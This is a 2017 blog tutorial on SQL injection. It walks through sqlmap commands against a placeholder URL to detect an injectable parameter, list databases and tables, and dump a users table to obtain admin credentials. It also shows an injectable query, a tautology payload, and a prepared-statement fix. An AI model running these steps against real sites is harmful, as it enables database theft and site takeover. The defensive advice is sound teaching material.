What is SQL Injection? How to do it with sqlmap?

SQL Injection is an around 18-year-old technique, yet many web applications are still prone to it. SQL Injection is a code injection technique. For simplicity, we will not get into its formal definition and technical terms.

So what is SQL Injection anyways?

To understand this, let us first understand what SQL is. SQL (Structured Query Language) is simply a language used to perform operations on a database. So in simple terms, SQL Injection is a technique where an attacker injects code into a query and retrieves information from the database.

If the attacker can retrieve information about users from the database, or any other sensitive information, then it is a matter of concern to you if you’re the one who owns the database.

Take the example of a website. Suppose it has an admin panel which controls a lot of things. If the attacker can get the admin credentials from the database with the SQL Injection technique, then you may well be doomed if you own the site.

SQL Injection is really a matter of concern.

Let us understand how an attacker can attack with a very popular tool called sqlmap.

There are plenty of tutorials available on how to install sqlmap on the internet. So we will focus more on its use.

Suppose a URL, http://example.com/page.php?id=27

What is happening in the backend here? A SQL query like the following may be written:

SELECT * FROM posts WHERE id='$_GET["id"]'

Please note that this query is not prepared, i.e. an attacker can change the query by injecting code through the id parameter.

Always remember to use prepared statements while writing SQL queries.

Now, coming back to attacking with sqlmap, let us understand how it is done.

STEP 1 — Check whether the victim URL is vulnerable or not.

sqlmap -u "http://example.com/page.php?id=27"

If you find out that it is vulnerable, then follow the next steps.

STEP 2 — Get database list.

sqlmap -u "http://example.com/page.php?id=27" --dbs

STEP 3 — Select a database of your concern. Let’s say it is “simpledatabase”. Now, get tables from it.

sqlmap -u "http://example.com/page.php?id=27" --tables -D simpledatabase

STEP 4 — Now you will see a list of tables from the database. “users” table may be what an attacker needs. So dump the users table by:

sqlmap -u "http://example.com/page.php?id=27" --dump -T users -D simpledatabase

And you have all the data of the users table.

Sometimes the --random-agent argument needs to be passed, as the server blocks a user if too many requests are made within a short time.

Now, similarly, if the attacker gets the login credentials for the admin panel, the attacker can pretty much write on your site that it is hacked. Who knows what will happen.

I hope that this stuff is clear to you.

Please Note: This tutorial is for learning purposes only. Don’t do any illegal activities. I am not responsible for any readers’ activities.

As a developer, you should always prepare your SQL statements. If you’re using PHP, please refer to the PDO library and learn to prepare statements with it.
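As an added example (not code from the original post), here is the page's vulnerable query pattern beside its prepared-statement fix, written in Python with sqlite3 instead of PHP/PDO so it runs stand-alone; the posts table and its rows are constructed for the demonstration.

```python
import sqlite3


def build_db():
    # Constructed sample data: an in-memory SQLite database standing in for
    # the site's real "posts" table (hypothetical rows, not from the page).
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE posts (id INTEGER PRIMARY KEY, title TEXT)")
    conn.executemany(
        "INSERT INTO posts VALUES (?, ?)",
        [(27, "Hello world"), (28, "Unpublished draft"), (29, "Notes")],
    )
    return conn


def fetch_post_vulnerable(conn, post_id):
    # Same shape as the page's query: the raw id parameter is pasted into
    # the SQL text, so whatever the client sends becomes part of the statement.
    query = "SELECT id, title FROM posts WHERE id='%s'" % post_id
    return conn.execute(query).fetchall()


def fetch_post_prepared(conn, post_id):
    # Prepared statement: the SQL text is fixed; the value travels separately
    # as a bound parameter and is never parsed as SQL.
    return conn.execute(
        "SELECT id, title FROM posts WHERE id=?", (post_id,)
    ).fetchall()


def compare(post_id):
    """Run both versions on the same input; returns (vulnerable_rows, prepared_rows)."""
    conn = build_db()
    try:
        return fetch_post_vulnerable(conn, post_id), fetch_post_prepared(conn, post_id)
    finally:
        conn.close()


if __name__ == "__main__":
    # Ordinary request: both variants return the single post with id 27.
    print(compare("27"))
    # Tampered id parameter of the kind sqlmap probes for: the concatenated
    # query now returns every row, while the prepared one returns nothing
    # because no id equals the literal string it was given.
    print(compare("27' OR '1'='1"))
```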

For now, I think this is enough for what the title says. Leave your feedback in the comments.

Thank You!

Originally published at zhow.in on September 27, 2017.
